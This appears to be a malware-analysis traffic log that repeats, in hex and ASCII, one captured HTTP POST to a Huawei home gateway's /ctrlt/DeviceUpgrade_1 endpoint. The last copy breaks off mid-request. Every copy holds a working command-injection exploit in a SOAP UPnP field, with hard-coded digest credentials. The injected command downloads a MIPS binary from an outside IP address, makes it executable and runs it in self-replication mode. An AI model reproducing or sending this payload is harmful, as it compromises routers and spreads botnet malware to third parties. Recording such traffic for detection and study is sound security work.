                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 491Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 